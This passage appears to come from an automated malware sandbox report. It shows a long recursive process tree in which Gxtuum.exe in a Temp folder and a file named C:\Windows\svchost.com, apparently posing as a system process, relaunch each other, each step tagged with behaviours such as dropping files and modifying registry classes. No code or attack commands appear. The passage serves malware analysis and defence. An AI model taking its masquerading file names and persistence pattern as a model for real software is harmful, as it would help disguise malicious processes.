- System Location Discovery: System Language Discovery
PID:2888 -
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe33⤵
- Checks computer location settings
PID:3740 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"34⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:4000 -
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe35⤵
- Checks computer location settings
- Modifies registry class
PID:4944 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"36⤵
- Drops file in Windows directory
PID:3268 -
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe37⤵
- Checks computer location settings
- Modifies registry class
PID:5004 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"38⤵
- System Location Discovery: System Language Discovery
PID:2004 -
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe39⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4672 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"40⤵PID:1916
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe41⤵
- Checks computer location settings
- Drops file in Windows directory
- Modifies registry class
PID:4036 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"42⤵
- Drops file in Windows directory
PID:3872 -
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe43⤵
- Checks computer location settings
- Drops file in Windows directory
- Modifies registry class
PID:3748 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"44⤵
- Drops file in Windows directory
PID:3280 -
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe45⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4960 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"46⤵
- System Location Discovery: System Language Discovery
PID:2528 -
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe47⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:1256 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"48⤵
- Drops file in Windows directory
PID:620 -
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe49⤵
- Checks computer location settings
- Modifies registry class
PID:4316 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"50⤵PID:844
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe51⤵
- Checks computer location settings
PID:4368 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"52⤵
- Drops file in Windows directory
PID:2488 -
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe53⤵
- Checks computer location settings
- Modifies registry class
PID:4536 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"54⤵PID:4064
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe55⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:5084 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"56⤵PID:1412
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe57⤵
- Checks computer location settings
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:3932 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"58⤵
- System Location Discovery: System Language Discovery
PID:2368 -
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe59⤵
- Drops file in Windows directory
PID:4960 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"60⤵PID:780
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe61⤵
- Checks computer location settings
- Modifies registry class
PID:4400 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"62⤵
- System Location Discovery: System Language Discovery
PID:3868 -
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe63⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4036 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"64⤵
- Drops file in Windows directory
PID:608 -
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe65⤵
- Checks computer location settings
PID:3352 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"66⤵PID:1984
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe67⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:4420 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"68⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:1172 -
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe69⤵
- Checks computer location settings
PID:3712 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"70⤵PID:4500
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe71⤵
- Modifies registry class
PID:5072 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"72⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:4944 -
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe73⤵
- System Location Discovery: System Language Discovery
PID:4548 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"74⤵
- Drops file in Windows directory
PID:1340 -
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe75⤵
- Modifies registry class
PID:4536 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"76⤵
- Drops file in Windows directory
PID:3728 -
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe77⤵
- Modifies registry class
PID:2284 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"78⤵
- Drops file in Windows directory
PID:3820 -
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe79⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:4040 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"80⤵PID:60
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe81⤵
- Checks computer location settings
- Drops file in Windows directory
PID:3280 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"82⤵PID:4892
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe83⤵
- Checks computer location settings
- Modifies registry class
PID:4312 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"84⤵
- Drops file in Windows directory
PID:4684 -
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe85⤵
- Modifies registry class
PID:3604 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"86⤵PID:4320
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe87⤵
- Checks computer location settings
- Modifies registry class
PID:3740 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"88⤵
- Drops file in Windows directory
PID:1916 -
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe89⤵
- Checks computer location settings
PID:2620 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"90⤵PID:4240
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe91⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:3872 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"92⤵PID:2344
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe93⤵
- Checks computer location settings
- Modifies registry class
PID:844 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"94⤵PID:2356
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe95⤵
- Checks computer location settings
- Modifies registry class
PID:1452 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"96⤵
- System Location Discovery: System Language Discovery
PID:5068 -
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe97⤵
- Drops file in Windows directory
- Modifies registry class
PID:4320 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"98⤵PID:4008
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe99⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:3276 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"100⤵
- Drops file in Windows directory
PID:1116 -
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe101⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:240 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"102⤵PID:1256
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe103⤵
- Checks computer location settings
PID:4316 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"104⤵PID:3872
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe105⤵
- Checks computer location settings
- Drops file in Windows directory
- Modifies registry class
PID:4400 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"106⤵
- Drops file in Windows directory
PID:4508 -
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe107⤵
- Checks computer location settings
- Modifies registry class
PID:2876 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"108⤵
- System Location Discovery: System Language Discovery
PID:4944 -
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe109⤵
- Checks computer location settings
- Drops file in Windows directory
- Modifies registry class
PID:1564 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"110⤵PID:1104
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe111⤵
- Checks computer location settings
- Modifies registry class
PID:4064 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"112⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:4276 -
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe113⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:1156 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"114⤵PID:908
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe115⤵PID:1680
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"116⤵PID:1152
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe117⤵
- Checks computer location settings
- Modifies registry class
PID:5028 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"118⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:3384 -
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe119⤵
- Checks computer location settings
- Modifies registry class
PID:4500 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"120⤵
- Drops file in Windows directory
PID:780 -
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe121⤵
- Checks computer location settings
- Modifies registry class
PID:4876 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"122⤵PID:5100
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-